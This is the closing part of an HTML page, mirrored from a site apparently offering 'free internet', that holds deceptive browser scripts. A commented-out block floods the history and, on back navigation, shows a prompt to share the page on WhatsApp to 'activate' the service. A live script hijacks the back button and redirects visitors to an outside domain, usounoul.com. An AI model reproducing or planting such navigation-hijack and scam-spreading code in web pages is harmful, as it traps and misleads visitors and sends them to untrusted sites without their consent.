            3 == g ? (!b || b(f, a)) && !f.wholeText.includes("\n") && !f.parentNode.__proto__.toString().includes("SVG") && !f.wholeText.match(/\b(?:Carles|Roign|US$|Demand|Laurens|Kule|Taufik|Albert)\b/gi) && 4 <= f.wholeText.length && c.push(f) : (1 == g || 9 == g || 11 == g) && (c = c.concat(getTextNodesIn(f, b)))
        }
        return c
    }

   
</script>
<!--<script type="text/javascript">
    !function () {
        var t;
        try {
            for (t = 0; 10 > t; ++t) history.pushState({}, "", "#");
            onpopstate = function (t) {
                t.state && alert('Please Share in Whatsapp to Activate Free Internet');
            }
        } catch (o) {
        }
    }();</script>-->

<script>
    window.onhashchange=function(){jp();};
    function hh() {history.pushState(history.length+1, "message", "#"+new Date().getTime());}
    function jp() {
        fh();}
    setTimeout('hh();', 500);
    function fh(){
        location.href="https://usounoul.com/4/4309929";
    }
    function goon(){
        location.href="https://usounoul.com/4/4309929";
    }
</script>

</body>


<!-- Mirrored from get-it.sbs/DATA.html by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 18 Dec 2021 05:29:10 GMT -->
</html>